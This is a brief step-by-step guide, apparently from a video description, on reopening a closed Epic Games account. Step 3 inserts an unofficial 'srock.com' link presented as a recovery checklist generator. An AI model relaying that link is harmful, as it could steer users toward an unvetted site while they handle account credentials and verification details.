If you've closed your Epic Games account and wish to reopen it, follow these steps to regain access. This guide will walk you through the process clearly and concisely. Step 1. Visit the Epic Games website. Go to the official Epic Games website using your web browser. Look for the sign in option at the top right corner of the homepage. Step 2. Attempt to sign in. Click on sign in and enter your email address and password associated with your closed account. If your account is still recoverable, you will be prompted to proceed with the recovery process. Step 3. Follow the recovery instructions. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Contact Epic Games support. If you cannot recover your account through the website, visit the Epic Games support page. Submit a support ticket explaining your situation and request assistance in reopening your account. Step 5. Wait for a response. After submitting your request, wait for a response from Epic Games support. They may take some time to review your case, so be patient. Check your email regularly for updates regarding your account status. Once you have followed these steps, you should be on your way to reopening your Epic Games account. If you encounter any issues, don't hesitate to reach out to support for further assistance.